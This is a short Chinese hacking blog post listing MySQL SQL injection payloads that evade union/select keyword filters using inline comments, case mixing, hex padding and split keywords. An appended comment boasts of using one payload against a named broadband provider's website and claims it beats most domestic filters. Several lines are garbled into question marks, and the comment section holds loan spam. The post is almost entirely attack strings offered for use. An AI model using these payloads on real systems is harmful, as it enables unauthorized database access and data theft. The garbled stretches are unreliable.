mysql 注射绕过语法 – 醉卧烟雨's Blog

id=-1+/*!uNioN*/+/*!SelEct*/+1,2,3,4--+
id=1/**/union/**/select/**/+1,2,3,4--+ 这个貌似没什么用。。
id=-1 and (select 1)=(select 0xAAA
AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAA mores)+/*!union*/+/*!SeleCt*/
+1,2,3,4--+  应该是对特定的系统。。。 具体不怎么清楚
id=-1+concat(u,n,i,o,n)+concat(s,
e,l,e,c,t)+all+1,2,3,4--+  没测试过

id=-1+uni/**/on+Sel/**/Ect+1
,2,3,4--+

??????????????????????????????????

???????????????????????????????

?????????????????????????????????

????????????????????????????

?????????

r00t注释：

过滤union select的时候必备啊~ 这都看不懂我也木办法了

用此语法绕过长城宽带官网

id=-1 and (select 1)=(select 
0xAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA mores)+/*!union*/+/*!Sele
Ct*/+1,2,3,4--+

此语法秒杀国内70%以上过滤~

???????????????????????????????????

????????????????

????????????????????????????????

?????????????????????

???????????????????????????????

fr0m:007 Team

《 “mysql 注射绕过语法” 》有 7 条评论

instant loans说道：

2014年9月27日上午9:59

Instant Payday Loan…

Emergency Payday Loans…

回复
醉卧烟雨说道：

-0001年11月30日上午12:00

@train quilt：{smile:13}

回复
s7ooL说道：

-0001年11月30日上午12:00

@四川美女：你站美女很漂亮啊！{smile:41}

回复
四川美女说道：

-0001年11月30日上午12:00

没搞懂，咋样呢？

回复
train quilt说道：

-0001年11月30日上午12:00

强悍！谢谢分享。{smile:17}

回复

《 “mysql 注射绕过语法” 》 有 7 条评论

发表回复 取消回复

《 “mysql 注射绕过语法” 》有 7 条评论

发表回复取消回复